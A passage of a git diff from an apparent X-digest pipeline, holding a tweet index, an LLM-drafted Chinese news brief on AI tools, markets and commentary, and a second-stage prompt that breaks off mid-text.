"https://x.com/bozhou_ai/status/2050092103565496369"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T05:42:39+00:00", "title": "避雷一下中国电信英国(CTExcel UK)\n虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制\n头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣", "url": "https://x.com/realNyarime/status/2050088491925815667"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T05:25:11+00:00", "title": "RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks", "url": "https://x.com/paulg/status/2050084092402688337"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T04:54:26+00:00", "title": "x.com/i/article/204974561199…", "url": "https://x.com/GoSailGlobal/status/2050076357296824737"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T04:51:28+00:00", "title": "今天看了 @GabiExplores 的两个项目:\n\nstitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台\n\nslopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测论文\n\n工程量:扎实。GitHub stars 加起来 24,X 关注 4。\n\n同期对比:obra/superpowers 173K,garrytan/gst", "url": "https://x.com/GoSailGlobal/status/2050075607707586658"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T04:39:44+00:00", "title": "⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。\n\n简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。\n\n这个观点我是认同的。说说自己的体验:\n\n1. 以前写一篇翻译稿,光是在浏览器、编辑器、翻译工具之间来回切换就要耗掉不少精力。现在直接在 Claude Code 里一条龙搞定,中间那些摩擦几乎消失了。\n2. 以前整", "url": "https://x.com/Pluvio9yte/status/2050072657618772226"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T04:32:27+00:00", "title": "我艹!这一波Codex+GPT2 真是成了!\n直接可以来开发游戏了,而且只是用嘴!\n\n一句话就可以搞起来,完整教程看藏师傅的教程👇", "url": "https://x.com/berryxia/status/2050070823256654283"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T04:13:08+00:00", "title": "假新闻、任何虚假的东西,总是能获得更多关注。这对吗?", "url": "https://x.com/dingyi/status/2050065962855182350"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T04:04:38+00:00", "title": "Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯\n\n不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。\n\n结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30%,剩下大部分也拿下。Genentech和Roche自己跑的CompBioBench也印证了,Claude Opus 4.6整体准确率冲到81%……\n\n这已经", "url": "https://x.com/Pluvio9yte/status/2050063821377810451"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T03:47:55+00:00", "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例", "url": "https://x.com/Pluvio9yte/status/2050059618043543563"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:44:13+00:00", "title": "Customer service in the age of AI has been become truly horrible. Excruciatingly bad.", "url": "https://x.com/GaryMarcus/status/2050058685531983988"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:37:32+00:00", "title": "Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t let me change delivery options, and I literally cannot reach a human. \n\nYou have s", "url": "https://x.com/GaryMarcus/status/2050057004862103767"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T03:24:52+00:00", "title": "这种平台有点意思,也见过好几个同类型的了。\n互动加热的平台其实很大程度上依赖宣传和用户自传播。\n见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样", "url": "https://x.com/Pluvio9yte/status/2050053813802090671"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T03:22:08+00:00", "title": "Computer plays the orchestra", "url": "https://x.com/AravSrinivas/status/2050053128452456584"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T03:15:22+00:00", "title": "RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs.\n\nSo the question becomes what is the business model of software and this headless approach in", "url": "https://x.com/paulg/status/2050051426446152159"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T03:12:06+00:00", "title": "RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.", "url": "https://x.com/GaryMarcus/status/2050050604915888484"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T03:08:51+00:00", "title": "🤔赚钱 -> 美股,长持复利\n\n2月开始关注上英特尔的,后面又加仓\n\n陈立武真是英特尔的福星", "url": "https://x.com/GoSailGlobal/status/2050049784094855501"}, {"handle": "AravSrinivas", "name": "Aravind Srinivas", "published_at": "2026-05-01T03:04:54+00:00", "title": "Video", "url": "https://x.com/AravSrinivas/status/2050048790908785072"}] diff --git a/data/x_brief/debug/20260502_033836_l1_stage1_output.json b/data/x_brief/debug/20260502_033836_l1_stage1_output.json new file mode 100644 index 0000000..eda04c0 --- /dev/null +++ b/data/x_brief/debug/20260502_033836_l1_stage1_output.json @@ -0,0 +1,239 @@ +{ + "raw_text": "\n\n{\"headline\":\"GPT-5.5发布会在即;Cursor SDK开放;Karpathy:Software 3.0拐点已至\",\"trending_keywords\":[\"GPT-5.5\",\"Cursor SDK\",\"Software 3.0\",\"Claude Code优化\",\"纳斯达克25000\"],\"themes\":[{\"id\":\"t1\",\"title\":\"Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日\",\"subtitle\":\" Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线\",\"priority\":\"P0\",\"bullets\":[\"Sam Altman:希望OpenAI做\\\"forever low margin\\\"公司,类比水电煤公用事业\",\"Switching costs正在崩塌,Altman认为AI真正价值是\\\"省掉不该做的事\\\"而非\\\"把某件事做得更好\\\"\",\"GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出\"],\"sample_urls\":[\"https://x.com/sama/status/2050274547061129577\",\"https://x.com/sama/status/2049653810558353746\",\"https://x.com/Pluvio9yte/status/2050221337424408733\"]},{\"id\":\"t2\",\"title\":\"Cursor SDK正式开放:可构建自定义背景Agent\",\"subtitle\":\" Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent\",\"priority\":\"P0\",\"bullets\":[\"Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent\",\"开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board\",\"Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent\"],\"sample_urls\":[\"https://x.com/cursor_ai/status/2049499866217185492\",\"https://x.com/cursor_ai/status/2049926283061035254\"]},{\"id\":\"t3\",\"title\":\"Karpathy:AI编程拐点已至,Software 3.0时代来临\",\"subtitle\":\" 在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进\",\"priority\":\"P0\",\"bullets\":[\"2025-12是拐点:生成代码块变大变连贯,编程最小单位从\\\"写代码\\\"升级到\\\"委派任务\\\"\",\"神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程\",\"验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件\"],\"sample_urls\":[\"https://x.com/Pluvio9yte/status/2050059618043543563\",\"https://x.com/runes_leo/status/2050096487967695197\"]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"Claude Code大更新:/resume提速67%,MCP支持并发连接\",\"meta\":\"runes_leo\",\"summary\":\"Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个\",\"url\":\"https://x.com/runes_leo/status/2050229609795407876\"},{\"id\":\"p02\",\"title\":\"纳斯达克首次突破25000点\",\"meta\":\"charliebilello\",\"summary\":\"纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800\",\"url\":\"https://x.com/charliebilello/status/2050210847650132146\"},{\"id\":\"p03\",\"title\":\"NVIDIA过去10年涨幅22875%,比特币17205%\",\"meta\":\"charliebilello\",\"summary\":\"过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%\",\"url\":\"https://x.com/charliebilello/status/2050263578188333549\"},{\"id\":\"p04\",\"title\":\"美国汽油价格创30年最大涨幅\",\"meta\":\"charliebilello\",\"summary\":\"美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大\",\"url\":\"https://x.com/charliebilello/status/2050196201014718675\"},{\"id\":\"p05\",\"title\":\"Anthropic发布BioMysteryBench:Claude在生物信息学领域突破\",\"meta\":\"Pluvio9yte\",\"summary\":\"BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%\",\"url\":\"https://x.com/Pluvio9yte/status/2050063821377810451\"},{\"id\":\"p06\",\"title\":\"OpenAI Codex升级:非编程计算机工作提速42%\",\"meta\":\"sama\",\"summary\":\"Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作\",\"url\":\"https://x.com/sama/status/2049946120441520624\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-05-01\",\"note\":\"Sam Altman转发\",\"url\":\"https://x.com/paulg/status/2050233324963008553\"},{\"id\":\"q2\",\"quote\":\"we want to build tools to augment and elevate people, not entities to replace them.\",\"speaker\":\"Sam Altman\",\"date\":\"2026-05-01\",\"note\":\"Altman回应AI导致失业担忧\",\"url\":\"https://x.com/sama/status/2050229058425045178\"},{\"id\":\"q3\",\"quote\":\"All the Doomers and hawks are lining up behind this distillation \\\"attack\\\" farce because they want to see open source banned.\",\"speaker\":\"Yann LeCun\",\"date\":\"2026-05-01\",\"note\":\"LeCun再次力挺开源,炮轰AI限制派\",\"url\":\"https://x.com/ylecun/status/2050162348891979817\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI编程工具\",\"subtitle\":\"Cursor SDK开放构建自定义Agent\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/cursor_ai/status/2049499866217185492\"],\"item_texts\":[\"Cursor SDK发布,可构建自定义背景Agent\",\"Cursor 3.2:/multitask并行子代理、multi-root跨仓库工作区、worktrees并行任务\"]},{\"id\":\"c2\",\"title\":\"模型与产品\",\"subtitle\":\"GPT-5.5发布会定档\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/sama/status/2049653810558353746\",\"https://x.com/sama/status/2049712078836170843\"],\"item_texts\":[\"GPT-5.5发布会5/5 5:55 PM在OpenAI SF总部\",\"GPT-5.5-Cyber网络安全模型即将推出\"]},{\"id\":\"c3\",\"title\":\"投资与宏观\",\"subtitle\":\"纳斯达克里程碑+能源价格飙升\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/charliebilello/status/2050210847650132146\",\"https://x.com/charliebilello/status/2050196201014718675\"],\"item_texts\":[\"纳斯达克首破25000点\",\"美国汽油价格创30年最大涨幅,9周涨47%至4.39美元/加仑\"]},{\"id\":\"c4\",\"title\":\"AI研究突破\",\"subtitle\":\"Karpathy Software 3.0 + Anthropic生物Bench\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/Pluvio9yte/status/2050059618043543563\",\"https://x.com/Pluvio9yte/status/2050063821377810451\"],\"item_texts\":[\"Karpathy:2025-12是AI编程拐点,最小单位从\\\"写代码\\\"升级为\\\"委派任务\\\"\",\"Anthropic BioMysteryBench:Claude Opus 4.6在生物信息学难题准确率81%\"]},{\"id\":\"c5\",\"title\":\"开源与生态\",\"subtitle\":\"LeCun再杠开源限制\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/ylecun/status/2050162348891979817\",\"https://x.com/runes_leo/status/2050127414630469937\"],\"item_texts\":[\"LeCun:Doomers想通过\\\"蒸馏攻击\\\"封禁开源,是在剥夺选择权\",\"匿名实验:Claude Code对含特定关键词的仓库报错\\\"out of extra usage\\\"\"]},{\"id\":\"c6\",\"title\":\"华语圈热点\",\"subtitle\":\"中文博主实操分享\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/lxfater/status/2050240636020732015\",\"https://x.com/0xAA_Science/status/2050244250563182801\"],\"item_texts\":[\"铁锤人:Apple Support App用Claude Code打包\",\"0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度\"]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"MID\",\"title\":\"Gary Marcus:AI对齐尚未解决,大规模部署风险极高\",\"detail\":\"Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险\",\"url\":\"https://x.com/GaryMarcus/status/2050296366161940584\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Gary Marcus:AI对GDP的贡献类似\\\"挖坑填坑\\\"\",\"detail\":\"引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值\",\"url\":\"https://x.com/GaryMarcus/status/2050284439343862266\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"用户隐私争议再起\",\"detail\":\"Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧\",\"url\":\"https://x.com/GaryMarcus/status/2050275183223857462\"}]}", + "parsed_draft": { + "headline": "GPT-5.5发布会在即;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "themes": [ + { + "id": "t1", + "title": "Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日", + "subtitle": " Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线", + "priority": "P0", + "bullets": [ + "Sam Altman:希望OpenAI做\"forever low margin\"公司,类比水电煤公用事业", + "Switching costs正在崩塌,Altman认为AI真正价值是\"省掉不该做的事\"而非\"把某件事做得更好\"", + "GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出" + ], + "sample_urls": [ + "https://x.com/sama/status/2050274547061129577", + "https://x.com/sama/status/2049653810558353746", + "https://x.com/Pluvio9yte/status/2050221337424408733" + ] + }, + { + "id": "t2", + "title": "Cursor SDK正式开放:可构建自定义背景Agent", + "subtitle": " Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent", + "priority": "P0", + "bullets": [ + "Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent", + "开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board", + "Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent" + ], + "sample_urls": [ + "https://x.com/cursor_ai/status/2049499866217185492", + "https://x.com/cursor_ai/status/2049926283061035254" + ] + }, + { + "id": "t3", + "title": "Karpathy:AI编程拐点已至,Software 3.0时代来临", + "subtitle": " 在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进", + "priority": "P0", + "bullets": [ + "2025-12是拐点:生成代码块变大变连贯,编程最小单位从\"写代码\"升级到\"委派任务\"", + "神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件" + ], + "sample_urls": [ + "https://x.com/Pluvio9yte/status/2050059618043543563", + "https://x.com/runes_leo/status/2050096487967695197" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "Claude Code大更新:/resume提速67%,MCP支持并发连接", + "meta": "runes_leo", + "summary": "Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个", + "url": "https://x.com/runes_leo/status/2050229609795407876" + }, + { + "id": "p02", + "title": "纳斯达克首次突破25000点", + "meta": "charliebilello", + "summary": "纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800", + "url": "https://x.com/charliebilello/status/2050210847650132146" + }, + { + "id": "p03", + "title": "NVIDIA过去10年涨幅22875%,比特币17205%", + "meta": "charliebilello", + "summary": "过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%", + "url": "https://x.com/charliebilello/status/2050263578188333549" + }, + { + "id": "p04", + "title": "美国汽油价格创30年最大涨幅", + "meta": "charliebilello", + "summary": "美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大", + "url": "https://x.com/charliebilello/status/2050196201014718675" + }, + { + "id": "p05", + "title": "Anthropic发布BioMysteryBench:Claude在生物信息学领域突破", + "meta": "Pluvio9yte", + "summary": "BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%", + "url": "https://x.com/Pluvio9yte/status/2050063821377810451" + }, + { + "id": "p06", + "title": "OpenAI Codex升级:非编程计算机工作提速42%", + "meta": "sama", + "summary": "Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作", + "url": "https://x.com/sama/status/2049946120441520624" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "speaker": "Paul Graham", + "date": "2026-05-01", + "note": "Sam Altman转发", + "url": "https://x.com/paulg/status/2050233324963008553" + }, + { + "id": "q2", + "quote": "we want to build tools to augment and elevate people, not entities to replace them.", + "speaker": "Sam Altman", + "date": "2026-05-01", + "note": "Altman回应AI导致失业担忧", + "url": "https://x.com/sama/status/2050229058425045178" + }, + { + "id": "q3", + "quote": "All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned.", + "speaker": "Yann LeCun", + "date": "2026-05-01", + "note": "LeCun再次力挺开源,炮轰AI限制派", + "url": "https://x.com/ylecun/status/2050162348891979817" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具", + "subtitle": "Cursor SDK开放构建自定义Agent", + "level": "P0", + "item_urls": [ + "https://x.com/cursor_ai/status/2049499866217185492" + ], + "item_texts": [ + "Cursor SDK发布,可构建自定义背景Agent", + "Cursor 3.2:/multitask并行子代理、multi-root跨仓库工作区、worktrees并行任务" + ] + }, + { + "id": "c2", + "title": "模型与产品", + "subtitle": "GPT-5.5发布会定档", + "level": "P0", + "item_urls": [ + "https://x.com/sama/status/2049653810558353746", + "https://x.com/sama/status/2049712078836170843" + ], + "item_texts": [ + "GPT-5.5发布会5/5 5:55 PM在OpenAI SF总部", + "GPT-5.5-Cyber网络安全模型即将推出" + ] + }, + { + "id": "c3", + "title": "投资与宏观", + "subtitle": "纳斯达克里程碑+能源价格飙升", + "level": "P1", + "item_urls": [ + "https://x.com/charliebilello/status/2050210847650132146", + "https://x.com/charliebilello/status/2050196201014718675" + ], + "item_texts": [ + "纳斯达克首破25000点", + "美国汽油价格创30年最大涨幅,9周涨47%至4.39美元/加仑" + ] + }, + { + "id": "c4", + "title": "AI研究突破", + "subtitle": "Karpathy Software 3.0 + Anthropic生物Bench", + "level": "P1", + "item_urls": [ + "https://x.com/Pluvio9yte/status/2050059618043543563", + "https://x.com/Pluvio9yte/status/2050063821377810451" + ], + "item_texts": [ + "Karpathy:2025-12是AI编程拐点,最小单位从\"写代码\"升级为\"委派任务\"", + "Anthropic BioMysteryBench:Claude Opus 4.6在生物信息学难题准确率81%" + ] + }, + { + "id": "c5", + "title": "开源与生态", + "subtitle": "LeCun再杠开源限制", + "level": "P2", + "item_urls": [ + "https://x.com/ylecun/status/2050162348891979817", + "https://x.com/runes_leo/status/2050127414630469937" + ], + "item_texts": [ + "LeCun:Doomers想通过\"蒸馏攻击\"封禁开源,是在剥夺选择权", + "匿名实验:Claude Code对含特定关键词的仓库报错\"out of extra usage\"" + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "中文博主实操分享", + "level": "P2", + "item_urls": [ + "https://x.com/lxfater/status/2050240636020732015", + "https://x.com/0xAA_Science/status/2050244250563182801" + ], + "item_texts": [ + "铁锤人:Apple Support App用Claude Code打包", + "0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度" + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "Gary Marcus:AI对齐尚未解决,大规模部署风险极高", + "detail": "Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险", + "url": "https://x.com/GaryMarcus/status/2050296366161940584" + }, + { + "id": "r2", + "level": "MID", + "title": "Gary Marcus:AI对GDP的贡献类似\"挖坑填坑\"", + "detail": "引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值", + "url": "https://x.com/GaryMarcus/status/2050284439343862266" + }, + { + "id": "r3", + "level": "OPP", + "title": "用户隐私争议再起", + "detail": "Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧", + "url": "https://x.com/GaryMarcus/status/2050275183223857462" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260502_033836_l1_stage2_input.txt b/data/x_brief/debug/20260502_033836_l1_stage2_input.txt new file mode 100644 index 0000000..dac32c6 --- /dev/null +++ b/data/x_brief/debug/20260502_033836_l1_stage2_input.txt @@ -0,0 +1,35 @@ +[meta] + +phase=stage2_finalize + +tweets=120 + + + +[prompt] + +你是“X资讯月报总编”。请基于阶段1草案,输出最终可渲染 JSON(阶段2定稿)。 + +要求: +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 必须严格使用最终字段: +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 保证 JSON 合法(双引号、无尾逗号)。 +4) 引用 URL 时,优先从“推文索引”中取值;samples/items 尽量带 url。 +5) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +6) 严格保留 stage1 草案中每个 theme 的 priority 字段(P0/P1/P2)。 +7) 严格保留 stage1 草案中的 trending_keywords 数组。 + +阶段1草案(JSON): +{"headline": "GPT-5.5发布会在即;Cursor SDK开放;Karpathy:Software 3.0拐点已至", "trending_keywords": ["GPT-5.5", "Cursor SDK", "Software 3.0", "Claude Code优化", "纳斯达克25000"], "themes": [{"id": "t1", "title": "Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日", "subtitle": " Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线", "priority": "P0", "bullets": ["Sam Altman:希望OpenAI做\"forever low margin\"公司,类比水电煤公用事业", "Switching costs正在崩塌,Altman认为AI真正价值是\"省掉不该做的事\"而非\"把某件事做得更好\"", "GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出"], "sample_urls": ["https://x.com/sama/status/2050274547061129577", "https://x.com/sama/status/2049653810558353746", "https://x.com/Pluvio9yte/status/2050221337424408733"]}, {"id": "t2", "title": "Cursor SDK正式开放:可构建自定义背景Agent", "subtitle": " Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent", "priority": "P0", "bullets": ["Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent", "开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board", "Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent"], "sample_urls": ["https://x.com/cursor_ai/status/2049499866217185492", "https://x.com/cursor_ai/status/2049926283061035254"]}, {"id": "t3", "title": "Karpathy:AI编程拐点已至,Software 3.0时代来临", "subtitle": " 在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进", "priority": "P0", "bullets": ["2025-12是拐点:生成代码块变大变连贯,编程最小单位从\"写代码\"升级到\"委派任务\"", "神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", "验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件"], "sample_urls": ["https://x.com/Pluvio9yte/status/2050059618043543563", "https://x.com/runes_leo/status/2050096487967695197"]}], "p0_events": [{"id": "p01", "title": "Claude Code大更新:/resume提速67%,MCP支持并发连接", "meta": "runes_leo", "summary": "Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个", "url": "https://x.com/runes_leo/status/2050229609795407876"}, {"id": "p02", "title": "纳斯达克首次突破25000点", "meta": "charliebilello", "summary": "纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800", "url": "https://x.com/charliebilello/status/2050210847650132146"}, {"id": "p03", "title": "NVIDIA过去10年涨幅22875%,比特币17205%", "meta": "charliebilello", "summary": "过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%", "url": "https://x.com/charliebilello/status/2050263578188333549"}, {"id": "p04", "title": "美国汽油价格创30年最大涨幅", "meta": "charliebilello", "summary": "美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大", "url": "https://x.com/charliebilello/status/2050196201014718675"}, {"id": "p05", "title": "Anthropic发布BioMysteryBench:Claude在生物信息学领域突破", "meta": "Pluvio9yte", "summary": "BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%", "url": "https://x.com/Pluvio9yte/status/2050063821377810451"}, {"id": "p06", "title": "OpenAI Codex升级:非编程计算机工作提速42%", "meta": "sama", "summary": "Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作", "url": "https://x.com/sama/status/2049946120441520624"}], "top_quotes": [{"id": "q1", "quote": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", "speaker": "Paul Graham", "date": "2026-05-01", "note": "Sam Altman转发", "url": "https://x.com/paulg/status/2050233324963008553"}, {"id": "q2", "quote": "we want to build tools to augment and elevate people, not entities to replace them.", "speaker": "Sam Altman", "date": "2026-05-01", "note": "Altman回应AI导致失业担忧", "url": "https://x.com/sama/status/2050229058425045178"}, {"id": "q3", "quote": "All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned.", "speaker": "Yann LeCun", "date": "2026-05-01", "note": "LeCun再次力挺开源,炮轰AI限制派", "url": "https://x.com/ylecun/status/2050162348891979817"}], "category_updates": [{"id": "c1", "title": "AI编程工具", "subtitle": "Cursor SDK开放构建自定义Agent", "level": "P0", "item_urls": ["https://x.com/cursor_ai/status/2049499866217185492"], "item_texts": ["Cursor SDK发布,可构建自定义背景Agent", "Cursor 3.2:/multitask并行子代理、multi-root跨仓库工作区、worktrees并行任务"]}, {"id": "c2", "title": "模型与产品", "subtitle": "GPT-5.5发布会定档", "level": "P0", "item_urls": ["https://x.com/sama/status/2049653810558353746", "https://x.com/sama/status/2049712078836170843"], "item_texts": ["GPT-5.5发布会5/5 5:55 PM在OpenAI SF总部", "GPT-5.5-Cyber网络安全模型即将推出"]}, {"id": "c3", "title": "投资与宏观", "subtitle": "纳斯达克里程碑+能源价格飙升", "level": "P1", "item_urls": ["https://x.com/charliebilello/status/2050210847650132146", "https://x.com/charliebilello/status/2050196201014718675"], "item_texts": ["纳斯达克首破25000点", "美国汽油价格创30年最大涨幅,9周涨47%至4.39美元/加仑"]}, {"id": "c4", "title": "AI研究突破", "subtitle": "Karpathy Software 3.0 + Anthropic生物Bench", "level": "P1", "item_urls": ["https://x.com/Pluvio9yte/status/2050059618043543563", 